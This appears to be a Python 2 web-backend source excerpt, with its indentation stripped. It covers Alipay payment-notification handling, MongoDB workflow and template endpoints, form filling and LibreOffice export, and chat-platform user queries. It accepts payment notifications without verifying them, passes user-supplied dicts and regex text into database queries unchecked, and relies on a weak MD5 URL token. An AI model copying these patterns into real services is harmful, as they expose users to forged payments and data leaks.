ds_plus = urllib.unquote_plus(buf)
ds_plus = dec_by_code(gConfig['pay_platform']['alipay']['input_charset'], ds_plus)
querydict = {}
data = {}
data['pay_channel'] = 'alipay'
try:
querydict = urlparse.parse_qs(ds_plus)
d = {}
for k in querydict.keys():
d[k] = querydict[k][0]
querydict = d
except:
querydict = {}
if querydict.has_key('seller_email'):
data['seller_email'] = querydict['seller_email']
if querydict.has_key('buyer_email'):
data['buyer_email'] = querydict['buyer_email']
if querydict.has_key('seller_id'):
data['seller_id'] = querydict['seller_id']
if querydict.has_key('buyer_id'):
data['buyer_id'] = querydict['buyer_id']
if querydict.has_key('notify_time'):
data['notify_time'] = querydict['notify_time']
if querydict.has_key('notify_id'):
data['notify_id'] = querydict['notify_id']
if querydict.has_key('notify_type'):
data['notify_type'] = querydict['notify_type']
if querydict.has_key('out_trade_no'):
data['out_trade_no'] = querydict['out_trade_no']
if querydict.has_key('subject'):
data['subject'] = querydict['subject']
if querydict.has_key('payment_type'):
data['payment_type'] = querydict['payment_type']
if querydict.has_key('trade_no'):
data['trade_no'] = querydict['trade_no']
if querydict.has_key('trade_status'):
data['trade_status'] = querydict['trade_status']
if gSecurityConfig['alipay']['trade_status'].has_key(data['trade_status']):
data['trade_status_desc'] = gSecurityConfig['alipay']['trade_status'][data['trade_status']]
if querydict.has_key('gmt_create'):
data['gmt_create'] = querydict['gmt_create']
if querydict.has_key('gmt_payment'):
data['gmt_payment'] = querydict['gmt_payment']
if querydict.has_key('gmt_close'):
data['gmt_close'] = querydict['gmt_close']
if querydict.has_key('gmt_refund'):
data['gmt_refund'] = querydict['gmt_refund']
if querydict.has_key('body'):
data['body'] = querydict['body']
if querydict.has_key('error_code'):
data['error_code'] = querydict['error_code']
if querydict.has_key('bank_seq_no'):
data['bank_seq_no'] = querydict['bank_seq_no']
if querydict.has_key('out_channel_type'):
data['out_channel_type'] = querydict['out_channel_type']
if querydict.has_key('out_channel_amount'):
data['out_channel_amount'] = querydict['out_channel_amount']
if querydict.has_key('out_channel_inst'):
data['out_channel_inst'] = querydict['out_channel_inst']
if querydict.has_key('business_scene'):
data['business_scene'] = querydict['business_scene']
if querydict.has_key('total_fee'):
data['total_fee'] = querydict['total_fee']
if querydict.has_key('notify_type') and 'trade_status_' in querydict['notify_type'] and data.has_key('out_trade_no'):
g = gevent.spawn(update_pay_log, data['out_trade_no'], data, False)
if querydict.has_key('notify_type') and querydict['notify_type'] == 'batch_refund_notify':
if querydict.has_key('batch_no'):
data['batch_no'] = querydict['batch_no']
if querydict.has_key('success_num'):
data['success_num'] = int(querydict['success_num'])
if querydict.has_key('result_details'):
arr = querydict['result_details'].split('^')
trade_no = arr[0]
refund_fee = float(arr[1])
refund_status = arr[2]
data['trade_no'] = trade_no
data['refund_fee'] = refund_fee
data['refund_status'] = refund_status
g = gevent.spawn(update_refund_log, data['trade_no'], data, False)
def handle_alipay_error_notify_url(environ):
global gConfig, gSecurityConfig
buf = environ['wsgi.input'].read()
ds_plus = urllib.unquote_plus(buf)
ds_plus = dec_by_code(gConfig['pay_platform']['alipay']['input_charset'], ds_plus)
querydict = {}
data = {}
data['pay_channel'] = 'alipay'
try:
querydict = urlparse.parse_qs(ds_plus)
d = {}
for k in querydict.keys():
d[k] = querydict[k][0]
querydict = d
except:
querydict = {}
if querydict.has_key('out_trade_no'):
data['out_trade_no'] = querydict['out_trade_no']
if querydict.has_key('error_code'):
data['error_code'] = querydict['error_code']
if gSecurityConfig['alipay']['error_code'].has_key(data['error_code']):
data['error_desc'] = gSecurityConfig['alipay']['error_code'][data['error_code']]
if data.has_key('out_trade_no'):
g = gevent.spawn(update_pay_log, data['out_trade_no'], data, False)
#g.join()
def get_querydict_by_GET_POST(environ):
querydict = {}
buf = None
if environ.has_key('QUERY_STRING'):
querystring = environ['QUERY_STRING']
querystring = urllib.unquote_plus(querystring)
querystring = dec(querystring)
try:
d = json.loads(querystring)
if isinstance(d, dict):
for k in d.keys():
querydict[k] = d[k]
except:
querydict = urlparse.parse_qs(querystring)
d = {}
for k in querydict.keys():
d[k] = querydict[k][0]
querydict = d
# try:
# # buf = environ['wsgi.input'].read()
# buf = stream.read()
# print('buf=')
# print(buf)
# ds_plus = urllib.unquote_plus(buf)
# obj = json.loads(dec(ds_plus))
# for k in obj.keys():
# querydict[k] = obj[k]
# except:
# pass
stream, form, files = werkzeug.formparser.parse_form_data(environ, charset='utf-8')
if len(form.keys()) > 0:
for key in form.keys():
try:
if isinstance(key, str):
key = dec(key)
obj = json.loads(key)
if isinstance(obj, dict):
for k in obj.keys():
querydict[k] = obj[k]
if isinstance(obj, list):
querydict = obj
except Exception,e:
print(e)
querydict[key] = form[key]
file_storage_list = []
if len(files.keys()) > 0:
for key in files.keys():
file_storage_list.extend(files.getlist(key))
for file_storage in file_storage_list:
if isinstance(file_storage, werkzeug.datastructures.FileStorage):
querydict['filename'] = file_storage.filename
querydict['content_type'] = file_storage.content_type
querydict['mimetype'] = file_storage.mimetype
# querydict['content_length'] = file_storage.content_length
buf = file_storage.read()
break
return querydict, buf
def handle_combiz_platform(environ):
global ENCODING
global gConfig, gRequest, gFormTemplate
def get_collection(collection):
ret = None
db_util.mongo_init_client('combiz_platform')
db = db_util.gClientMongo['combiz_platform'][gConfig['combiz_platform']['mongodb']['database']]
if not collection in db.collection_names(False):
ret = db.create_collection(collection)
else:
ret = db[collection]
return ret
#Rule('/workflow_add', endpoint='workflow_add'),
#Rule('/workflow_query', endpoint='workflow_query'),
#Rule('/workflow_query/<_id>', endpoint='workflow_query'),
#Rule('/workflow_update', endpoint='workflow_update'),
#Rule('/workflow_delete', endpoint='workflow_delete'),
#Rule('/workflow_delete/<_id>', endpoint='workflow_delete'),
#Rule('/workflow_template_add', endpoint='workflow_template_add'),
#Rule('/workflow_template_query', endpoint='workflow_template_query'),
#Rule('/workflow_template_query/<_id>', endpoint='workflow_template_query'),
#Rule('/workflow_template_update', endpoint='workflow_template_update'),
#Rule('/workflow_template_delete', endpoint='workflow_template_delete'),
#Rule('/workflow_template_delete/<_id>', endpoint='workflow_template_delete'),
def workflow_add(querydict):
ret = ''
if querydict.has_key('order_id'):
try:
collection = get_collection(gConfig['combiz_platform']['mongodb']['collection_workflow'])
existone = collection.find_one({'order_id':querydict['order_id']})
if existone:
ret = json.dumps({'result':u'workflow_add_order_id_already_exist' }, ensure_ascii=True, indent=4)
else:
_id = collection.save(querydict)
o = collection.find_one({'_id':_id})
ret = json.dumps(db_util.remove_mongo_id(o), ensure_ascii=True, indent=4)
except:
if hasattr(sys.exc_info()[1], 'message'):
ret = json.dumps({'result':u'workflow_add_fail:%s' % sys.exc_info()[1].message}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'workflow_add_fail' }, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'workflow_add_order_id_required' }, ensure_ascii=True, indent=4)
return ret
def workflow_query(querydict):
ret = ''
o = None
try:
#print(querydict)
collection = get_collection(gConfig['combiz_platform']['mongodb']['collection_workflow'])
limit = 10
skip = 0
ssort = None
cond = {}
if querydict.has_key('limit'):
limit = int(querydict['limit'])
if querydict.has_key('offset'):
skip = int(querydict['offset'])
if querydict.has_key('order'):
ssort = []
if querydict['order'] == 'asc':
ssort = [('order_id', pymongo.ASCENDING),]
if querydict['order'] == 'desc':
ssort = [('order_id', pymongo.DESCENDING),]
if querydict.has_key('_id'):
o = collection.find_one({'_id':db_util.add_mongo_id(querydict['_id'])})
elif querydict.has_key('order_id'):
if '*' in querydict['order_id']:
cond = {'order_id': {'$regex':'^.*' + querydict['order_id'].replace('*', '') + '.*$'}}
#print(cond)
o = list(collection.find(cond, skip=skip, limit=limit, sort=ssort))
#print(o)
else:
o = collection.find_one({'order_id':querydict['order_id']})
else:
ssort = None
cond = {}
if querydict.has_key('search_field') and querydict.has_key('search'):
cond = {str(querydict['search_field']): {'$regex':'^.*' + querydict['search'].replace('*', '') + '.*$'}}
if querydict.has_key('order'):
ssort = []
if querydict['order'] == 'asc':
ssort = [(str(querydict['search_field']), pymongo.ASCENDING),]
if querydict['order'] == 'desc':
ssort = [(str(querydict['search_field']), pymongo.DESCENDING),]
o = list(collection.find(cond, skip=skip, limit=limit, sort=ssort))
if o:
ret = json.dumps(db_util.remove_mongo_id(o), ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'workflow_query_workflow_not_exist' }, ensure_ascii=True, indent=4)
#if not querydict.has_key('_id') and not querydict.has_key('order_id'):
#ret = json.dumps({'result':u'workflow_query_id_or_order_id_required' }, ensure_ascii=True, indent=4)
except:
if hasattr(sys.exc_info()[1], 'message'):
ret = json.dumps({'result':u'workflow_query_fail:%s' % sys.exc_info()[1].message}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'workflow_query_fail' }, ensure_ascii=True, indent=4)
return ret
def workflow_update(querydict):
ret = ''
try:
collection = get_collection(gConfig['combiz_platform']['mongodb']['collection_workflow'])
if querydict.has_key('_id'):
existone = collection.find_one({'_id':db_util.add_mongo_id(querydict['_id'])})
if existone:
collection.update({'_id':existone['_id']}, {'$set': db_util.add_mongo_id(querydict)}, multi=False, upsert=False)
one = collection.find_one(db_util.add_mongo_id({'_id':existone['_id']}))
ret = json.dumps(db_util.remove_mongo_id(one), ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'workflow_update_workflow_not_exist' }, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'workflow_update_id_required' }, ensure_ascii=True, indent=4)
except:
if hasattr(sys.exc_info()[1], 'message'):
ret = json.dumps({'result':u'workflow_update_fail:%s' % sys.exc_info()[1].message}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'workflow_update_fail' }, ensure_ascii=True, indent=4)
return ret
def workflow_delete(querydict):
ret = ''
try:
collection = get_collection(gConfig['combiz_platform']['mongodb']['collection_workflow'])
if querydict.has_key('_id'):
if isinstance(querydict['_id'], str) or isinstance(querydict['_id'], unicode):
existone = collection.find_one({'_id':db_util.add_mongo_id(querydict['_id'])})
if existone:
collection.remove({'_id':existone['_id']})
ret = json.dumps(db_util.remove_mongo_id(existone), ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'workflow_delete_workflow_not_exist' }, ensure_ascii=True, indent=4)
if isinstance(querydict['_id'], list):
ids = db_util.add_mongo_id(querydict['_id'])
cond = {'_id':{'$in':ids}}
collection.remove(cond)
ret = json.dumps(db_util.remove_mongo_id(querydict['_id']), ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'workflow_delete_id_required' }, ensure_ascii=True, indent=4)
except:
if hasattr(sys.exc_info()[1], 'message'):
ret = json.dumps({'result':u'workflow_delete_fail:%s' % sys.exc_info()[1].message}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'workflow_delete_fail' }, ensure_ascii=True, indent=4)
return ret
def workflow_template_add(querydict):
ret = ''
if querydict.has_key('name') \
and querydict.has_key('nodes') \
and querydict.has_key('edges'):
try:
collection = get_collection(gConfig['combiz_platform']['mongodb']['collection_workflow_template'])
existone = collection.find_one({'name':querydict['name']})
if existone:
ret = json.dumps({'result':u'workflow_template_add_name_already_exist' }, ensure_ascii=True, indent=4)
else:
_id = collection.save(db_util.add_mongo_id(querydict))
o = collection.find_one({'_id':_id})
ret = json.dumps(db_util.remove_mongo_id(o), ensure_ascii=True, indent=4)
except:
if hasattr(sys.exc_info()[1], 'message'):
ret = json.dumps({'result':u'workflow_template_add_fail:%s' % sys.exc_info()[1].message}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'workflow_template_add_fail' }, ensure_ascii=True, indent=4)
else:
if not querydict.has_key('name'):
ret = json.dumps({'result':u'workflow_template_add_name_required' }, ensure_ascii=True, indent=4)
if not querydict.has_key('nodes'):
ret = json.dumps({'result':u'workflow_template_add_nodes_required' }, ensure_ascii=True, indent=4)
if not querydict.has_key('edges'):
ret = json.dumps({'result':u'workflow_template_add_edges_required' }, ensure_ascii=True, indent=4)
return ret
def workflow_template_query(querydict):
ret = ''
o = None
try:
collection = get_collection(gConfig['combiz_platform']['mongodb']['collection_workflow_template'])
o = None
limit = 10
skip = 0
ssort = None
cond = {}
if querydict.has_key('limit'):
limit = int(querydict['limit'])
if querydict.has_key('offset'):
skip = int(querydict['offset'])
if querydict.has_key('order'):
ssort = []
if querydict['order'] == 'asc':
ssort = [('name', pymongo.ASCENDING),]
if querydict['order'] == 'desc':
ssort = [('name', pymongo.DESCENDING),]
if querydict.has_key('name'):
if '*' in querydict['name']:
cond = {'name': {'$regex':'^.*' + querydict['name'].replace('*', '') + '.*$'}}
o = list(collection.find(cond, skip=skip, limit=limit, sort=ssort))
else:
o = collection.find_one({'name':querydict['name']})
elif querydict.has_key('_id'):
o = collection.find_one({'_id':db_util.add_mongo_id(querydict['_id'])})
if o:
ret = json.dumps(db_util.remove_mongo_id(o), ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'workflow_template_query_workflow_not_exist' }, ensure_ascii=True, indent=4)
else:
ssort = None
cond = {}
if querydict.has_key('search_field') and querydict.has_key('search'):
cond = {str(querydict['search_field']): {'$regex':'^.*' + querydict['search'].replace('*', '') + '.*$'}}
if querydict.has_key('order'):
ssort = []
if querydict['order'] == 'asc':
ssort = [(str(querydict['search_field']), pymongo.ASCENDING),]
if querydict['order'] == 'desc':
ssort = [(str(querydict['search_field']), pymongo.DESCENDING),]
o = list(collection.find(cond, skip=skip, limit=limit, sort=ssort))
ret = json.dumps(db_util.remove_mongo_id(o), ensure_ascii=True, indent=4)
except:
if hasattr(sys.exc_info()[1], 'message'):
ret = json.dumps({'result':u'workflow_template_query_fail:%s' % sys.exc_info()[1].message}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'workflow_template_query_fail' }, ensure_ascii=True, indent=4)
return ret
def workflow_template_update(querydict):
ret = ''
try:
collection = get_collection(gConfig['combiz_platform']['mongodb']['collection_workflow_template'])
if querydict.has_key('_id'):
existone = collection.find_one({'_id':db_util.add_mongo_id(querydict['_id'])})
if existone:
collection.update({'_id':existone['_id']}, {'$set': db_util.add_mongo_id(querydict)}, multi=False, upsert=False)
one = collection.find_one({'_id':existone['_id']})
ret = json.dumps(db_util.remove_mongo_id(one), ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'workflow_template_update_workflow_not_exist' }, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'workflow_template_update_id_required' }, ensure_ascii=True, indent=4)
except:
if hasattr(sys.exc_info()[1], 'message'):
ret = json.dumps({'result':u'workflow_template_update_fail:%s' % sys.exc_info()[1].message}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'workflow_template_update_fail' }, ensure_ascii=True, indent=4)
return ret
def workflow_template_delete(querydict):
ret = ''
try:
collection = get_collection(gConfig['combiz_platform']['mongodb']['collection_workflow'])
if querydict.has_key('_id'):
if isinstance(querydict['_id'], str) or isinstance(querydict['_id'], unicode):
existone = collection.find_one({'_id':db_util.add_mongo_id(querydict['_id'])})
if existone:
collection.remove({'_id':existone['_id']})
ret = json.dumps(db_util.remove_mongo_id(existone), ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'workflow_template_delete_workflow_not_exist' }, ensure_ascii=True, indent=4)
if isinstance(querydict['_id'], list):
ids = db_util.add_mongo_id(querydict['_id'])
cond = {'_id':{'$in':ids}}
collection.remove(cond)
ret = json.dumps(db_util.remove_mongo_id(querydict['_id']), ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'workflow_template_delete_id_required' }, ensure_ascii=True, indent=4)
except:
if hasattr(sys.exc_info()[1], 'message'):
ret = json.dumps({'result':u'workflow_template_delete_fail:%s' % sys.exc_info()[1].message}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'workflow_template_delete_fail' }, ensure_ascii=True, indent=4)
return ret
def get_form(form_id):
global gFormTemplate
ret = None
for i in gFormTemplate:
if i['form_path'] == form_id:
ret = i
break
return ret
def get_out_tmp_dir(dirname):
out_dir = os.path.join(dirname, 'export_tmp')
if not os.path.exists(out_dir):
os.mkdir(out_dir)
now = time.strftime('%Y-%m-%d %H:%M:%S')[:19].replace('-','').replace(' ','').replace(':','')
out_dir = os.path.join(out_dir, '%s-%s' % ( now , uuid.uuid4()))
if not os.path.exists(out_dir):
os.mkdir(out_dir)
return out_dir
def form_blank(querydict):
global gFormTemplate
ret = ''
content_type = 'text/json'
filename = None
if len(gFormTemplate) == 0:
p = os.path.join(STATICRESOURCE_DIR, 'form_templates', 'list.json')
if os.path.exists(p):
try:
with open(p, 'r') as f:
f1 = gevent.fileobject.FileObjectThread(f, 'r')
gFormTemplate = json.loads(f1.read())
except:
ret = json.dumps({'result':u'form_blank_list_json_parse_error'}, ensure_ascii=True, indent=4)
return ret, content_type, filename
else:
ret = json.dumps({'result':u'form_blank_list_json_not_exist'}, ensure_ascii=True, indent=4)
return ret, content_type, filename
if querydict.has_key('form_id'):
form = get_form(querydict['form_id'])
if form and form.has_key('blank_document'):
out_path = form['blank_document']
out_path = os.path.join(STATICRESOURCE_DIR, out_path)
if os.path.exists(out_path):
ext = 'pdf'
if querydict.has_key('format'):
ext = querydict['format']
ret,content_type = form_export(out_path, ext)
if querydict.has_key('attachmentdownload') and querydict['attachmentdownload'] is True:
filename = os.path.basename(form['blank_document'])
filename = filename[:filename.rindex('.')]
filename = '%s%s.%s' % (filename , u'(空白)', ext)
else:
ret = json.dumps({'result':u'form_blank_generated_document_not_exist'}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'form_blank_blank_document_need_specify_in_list_json'}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'form_blank_form_id_required'}, ensure_ascii=True, indent=4)
return ret, content_type, filename
def form_fill(querydict):
global gFormTemplate
def check_is_bool(form, fld):
ret = False
if form.has_key('bool') and isinstance(form['bool'], list):
for i in form['bool']:
if i == fld:
ret = True
break
return ret
def chinese_date(value):
ret = value
if len(ret) == 19 :
if ret[4] == u'-' and ret[7] == u'-' and ret[10] == u' ':
ret1 = ret[:4]
ret1 += u'年'
ret1 += ret[5:7]
ret1 += u'月'
ret1 += ret[8:10]
ret1 += u'日'
ret = ret1
return ret
def check_is_image(form, fld):
ret = False
if form.has_key('image') and isinstance(form['image'], list):
for i in form['image']:
if i == fld:
ret = True
break
return ret
def check_is_list(form, fld):
ret = False
if form.has_key('list') and isinstance(form['list'], list):
for i in form['list']:
if i == fld:
ret = True
break
return ret
def fill_tpl(form, form_data):
template_document = os.path.join(STATICRESOURCE_DIR, form['template_document'])
dirname = os.path.dirname(template_document)
basename = os.path.basename(template_document)
basename = basename.replace('_template', '')
out_dir = get_out_tmp_dir(dirname)
out_path = os.path.join(out_dir, basename)
t = Template(template_document, out_path)
data = {}
document = Py3oItem()
file_service_url = '%s://%s:%s/fileservice/rest/file/' % (gConfig['combiz_platform']['proxy_file']['protocol'], gConfig['combiz_platform']['proxy_file']['host'], gConfig['combiz_platform']['proxy_file']['port'])
for k in form_data.keys():
#listobj = check_is_list(form, k)
if check_is_bool(form, k):
if form_data[k] is True:
setattr(document, k, u'\u2611')
if form_data[k] is False:
setattr(document, k, u'\u2610')
elif check_is_list(form, k):
data[k] = []
for i in form_data[k]:
item = Py3oItem()
for kk in i.keys():
setattr(item, kk, chinese_date(i[kk]))
data[k].append(item)
elif check_is_image(form, k):
out_path1 = os.path.join(out_dir, form_data[k])
url = URL(file_service_url + form_data[k])
client = HTTPClient.from_url(url)
try:
response = client.get(url.request_uri)
if hasattr(response, 'status_code') and (response.status_code == 200 or response.status_code == 304):
with open(out_path1, 'wb') as f:
f1 = gevent.fileobject.FileObjectThread(f, 'wb')
f1.write(response.read())
if os.path.exists(out_path1):
t.set_image_path(k, out_path1)
except Exception,e:
print(e)
out_path1 = os.path.join(STATICRESOURCE_DIR, 'form_templates', 'document', 'no-photo.jpg')
t.set_image_path(k, out_path1)
else:
setattr(document, k, chinese_date(form_data[k]))
data['document'] = document
#print(dir(data))
t.render(data)
return out_path
ret = ''
content_type = 'text/json'
filename = None
if len(gFormTemplate) == 0:
p = os.path.join(STATICRESOURCE_DIR, 'form_templates', 'list.json')
if os.path.exists(p):
try:
with open(p, 'r') as f:
f1 = gevent.fileobject.FileObjectThread(f, 'r')
gFormTemplate = json.loads(f1.read())
except:
ret = json.dumps({'result':u'form_fill_list_json_parse_error'}, ensure_ascii=True, indent=4)
return ret, content_type, filename
else:
ret = json.dumps({'result':u'form_fill_list_json_not_exist'}, ensure_ascii=True, indent=4)
return ret, content_type, filename
o = json.loads(workflow_query(querydict))
if o.has_key('result'):
ret = json.dumps(o, ensure_ascii=True, indent=4)
else:
if querydict.has_key('form_id'):
if o.has_key('form_data') and isinstance(o['form_data'], dict):
if querydict['form_id'] in o['form_data'].keys():
form_data = o['form_data'][querydict['form_id']]
form = get_form(querydict['form_id'])
if form and form.has_key('template_document'):
out_path = fill_tpl(form, form_data)
if os.path.exists(out_path):
ext = 'pdf'
if querydict.has_key('format'):
ext = querydict['format']
ret, content_type = form_export(out_path, ext)
if querydict.has_key('attachmentdownload') and querydict['attachmentdownload'] is True:
filename = os.path.basename(form['template_document']).replace('_template', '')
filename = filename[:filename.rindex('.')]
filename = '%s%s.%s' % (filename , u'(已填)', ext)
else:
ret = json.dumps({'result':u'form_fill_generated_document_not_exist'}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'form_fill_template_document_need_specify_in_list_json'}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'form_fill_form_id_not_exist'}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'form_fill_form_data_is_none'}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'form_fill_form_id_required'}, ensure_ascii=True, indent=4)
return ret, content_type, filename
def form_export(src, ext):
dirname = os.path.dirname(src)
out_dir = get_out_tmp_dir(dirname)
out_path = os.path.basename(src)
idx = out_path.rindex('.')
out_path = out_path[:idx+1] + ext
out_path = os.path.join(out_dir, out_path)
ret = json.dumps({'result':'unsupport export format.'}, ensure_ascii=True, indent=4)
content_type = 'text/json'
format = 'pdf'
if ext == 'pdf':
#format = 'pdf:writer pdf Export'
format = 'pdf'
content_type = 'application/pdf'
elif ext == 'doc':
format = 'doc:MS Word 97'
content_type = 'application/msword'
elif ext == 'docx':
format = 'docx:MS Word 2007 XML'
content_type = 'application/vnd.openxmlformats-officedocument.wordprocessingml.document'
elif ext == 'html':
format = 'html:XHTML Writer File'
content_type = 'text/html'
encfunc = enc
if sys.platform == 'win32':
encfunc = enc1
cmd = [
encfunc(gConfig['combiz_platform']['libreoffice']['executable_path']),
'--headless',
'--convert-to',
format,
'--outdir',
encfunc(out_dir),
encfunc(src)
]
output = check_output(cmd)
print(output)
#if len(output.strip())>0:
#ret = json.dumps({'result':output}, ensure_ascii=True, indent=4)
#content_type = 'text/json'
if not os.path.exists(out_path):
ret = json.dumps({'result':'export failed:file not exist.'}, ensure_ascii=True, indent=4)
content_type = 'text/json'
if os.path.exists(out_path):
with open(out_path, 'rb') as f:
f1 = gevent.fileobject.FileObjectThread(f, 'rb')
ret = f1.read()
return ret, content_type
def check_url_token(querydict):
is_token_pass = False
enable_url_md5_check = False
md5prefix = ''
if gConfig['combiz_platform'].has_key('security') \
and gConfig['combiz_platform']['security'].has_key('md5prefix'):
md5prefix = str(gConfig['combiz_platform']['security']['md5prefix'])
if gConfig['combiz_platform'].has_key('security') \
and gConfig['combiz_platform']['security'].has_key('enable_url_md5_check') \
and gConfig['combiz_platform']['security']['enable_url_md5_check'].lower() == 'true':
enable_url_md5_check = True
else:
is_token_pass = True
if enable_url_md5_check:
print('checking token...')
if querydict.has_key('_token'):
plain = '%s_|_%s' % (md5prefix, time.strftime('%Y%m%d%H'))
token = md5.new(plain).hexdigest()
if token == str(querydict['_token']):
is_token_pass = True
return is_token_pass
headers = {}
headers['Content-Type'] = 'text/json;charset=' + ENCODING
statuscode = '200 OK'
body = ''
isnew = False
urls = gUrlMap.bind_to_environ(environ)
querydict, buf = get_querydict_by_GET_POST(environ)
try:
endpoint, args = urls.match()
if args.has_key('_id'):
querydict['_id'] = args['_id']
if endpoint not in []:
if not check_url_token(querydict):
body = json.dumps({'result': u'invalid_token'}, ensure_ascii=True, indent=4)
return statuscode, headers, body
if querydict.has_key('_token'):
del querydict['_token']
if endpoint == 'workflow_add':
body = workflow_add(querydict)
elif endpoint == 'workflow_query':
body = workflow_query(querydict)
elif endpoint == 'workflow_update':
body = workflow_update(querydict)
elif endpoint == 'workflow_delete':
body = workflow_delete(querydict)
elif endpoint == 'workflow_template_add':
body = workflow_template_add(querydict)
elif endpoint == 'workflow_template_query':
body = workflow_template_query(querydict)
elif endpoint == 'workflow_template_update':
body = workflow_template_update(querydict)
elif endpoint == 'workflow_template_delete':
body = workflow_template_delete(querydict)
elif endpoint == 'workflow_form_fill':
body, content_type, filename = form_fill(querydict)
headers['Content-Type'] = content_type
if filename:
headers['Content-Disposition'] = 'attachment;filename="' + enc(filename) + '"'
elif endpoint == 'workflow_form_blank':
body, content_type, filename = form_blank(querydict)
headers['Content-Type'] = content_type
if filename:
headers['Content-Disposition'] = 'attachment;filename="' + enc(filename) + '"'
else:
body = json.dumps({'result':u'access_deny'}, ensure_ascii=True, indent=4)
except HTTPException, e:
body = json.dumps({'result':u'access_deny'}, ensure_ascii=True, indent=4)
return statuscode, headers, body
def handle_chat_platform(environ, session):
global ENCODING
global gConfig, gRequest, gSessionStore, gUrlMap, gSecurityConfig, gWebSocketsMap, gJoinableQueue
def get_collection(collection):
ret = None
db_util.mongo_init_client('chat_platform')
db = db_util.gClientMongo['chat_platform'][gConfig['chat_platform']['mongodb']['database']]
if not collection in db.collection_names(False):
ret = db.create_collection(collection)
else:
ret = db[collection]
return ret
def user_query(session, querydict):
ret = []
collection = get_collection(gConfig['chat_platform']['mongodb']['collection_users'])
q = {}
limit = 0
skip = 0
user_detail = False
if querydict.has_key('user_detail') and querydict['user_detail'] is True:
user_detail = True
del querydict['user_detail']
if querydict.has_key('limit'):
limit = int(querydict['limit'])
del querydict['limit']
if querydict.has_key('skip'):
skip = int(querydict['skip'])
del querydict['skip']
if querydict.has_key('username'):
if isinstance(querydict['username'], str) or isinstance(querydict['username'], unicode):
q['username'] = querydict['username']
if isinstance(querydict['username'], list):
q['username'] = {'$in': querydict['username']}
if isinstance(querydict['username'], dict):
q['username'] = querydict['username']
if querydict.has_key('_id'):
if isinstance(querydict['_id'], str) or isinstance(querydict['_id'], unicode):
q['_id'] = db_util.add_mongo_id(querydict['_id'])
if isinstance(querydict['_id'], list):
q['_id'] = {'$in': [db_util.add_mongo_id(i) for i in querydict['_id']]}
if isinstance(querydict['_id'], dict):
q['_id'] = querydict['_id']
rec = list(collection.find(q).limit(limit).skip(skip))
keys = gWebSocketsMap.keys()
for i in rec:
if user_detail:
if str(i['_id']) in keys:
i['online_status'] = 'online'
else:
i['online_status'] = 'offline'
ret.append(i)
return ret
def group_query(session, querydict={}):
ret = []
collection = get_collection(gConfig['chat_platform']['mongodb']['collection_groups'])
q = {}
limit = 0
skip = 0
if querydict.has_key('limit'):
limit = int(querydict['limit'])
del querydict['limit']
if querydict.has_key('skip'):
skip = int(querydict['skip'])
del querydict['skip']
if querydict.has_key('group_name'):
if isinstance(querydict['group_name'], str) or isinstance(querydict['group_name'], unicode):
q['group_name'] = querydict['group_name']
if isinstance(querydict['group_name'], list):
q['group_name'] = {'$in': querydict['group_name']}
if isinstance(querydict['group_name'], dict):
q['group_name'] = querydict['group_name']
if querydict.has_key('_id'):
if isinstance(querydict['_id'], str) or isinstance(querydict['_id'], unicode):
q['_id'] = querydict['_id']
if isinstance(querydict['_id'], list):
q['_id'] = {'$in': querydict['_id']}
ret = list(collection.find(db_util.add_mongo_id(q)).limit(limit).skip(skip))
if querydict.has_key('user_detail') and querydict['user_detail'] is True:
keys = gWebSocketsMap.keys()
for i in ret:
idx = ret.index(i)
detail = []
userlist = user_query(session, {'_id':i['members']})
for j in userlist:
if j.has_key('contacts'):
del j['contacts']
if j.has_key('password'):
del j['password']
if str(j['_id']) in keys:
j['online_status'] = 'online'
else:
j['online_status'] = 'offline'
detail.append(j)
ret[idx]['members'] = detail
return ret
def group_get(session, querydict):
rec = group_query(session, querydict)
if len(rec)>0:
ret = json.dumps(db_util.remove_mongo_id(rec), ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'query_no_record'}, ensure_ascii=True, indent=4)
return ret
def user_group_get(session, querydict):
ret = []
collection = get_collection(gConfig['chat_platform']['mongodb']['collection_groups'])
q = {}
if querydict.has_key('username'):
if isinstance(querydict['username'], str) or isinstance(querydict['username'], unicode) or isinstance(querydict['username'], dict):
q['username'] = querydict['username']
if querydict.has_key('_id'):
if isinstance(querydict['_id'], str) or isinstance(querydict['_id'], unicode):
q['_id'] = db_util.add_mongo_id(querydict['_id'])
if len(q.keys())>0:
users = user_query(session, querydict)
if len(users)>0:
user0 = users[0]
_id = user0['_id']
grps = group_query(session)
for i in grps:
if i.has_key('members') and _id in i['members']:
ret.append(i)
ret = json.dumps(db_util.remove_mongo_id(ret), ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'user_group_get_user_not_exist'}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'user_group_get_one_user_required'}, ensure_ascii=True, indent=4)
return ret
def all_user_get(session, querydict):
limit = 0
skip = 0
filter_str = ''
if querydict.has_key('user_detail') and querydict['user_detail'] is True:
user_detail = True
del querydict['user_detail']
if querydict.has_key('limit'):
try:
limit = int(querydict['limit'])
except:
pass
del querydict['limit']
if querydict.has_key('skip'):
try:
skip = int(querydict['skip'])
except:
pass
del querydict['skip']
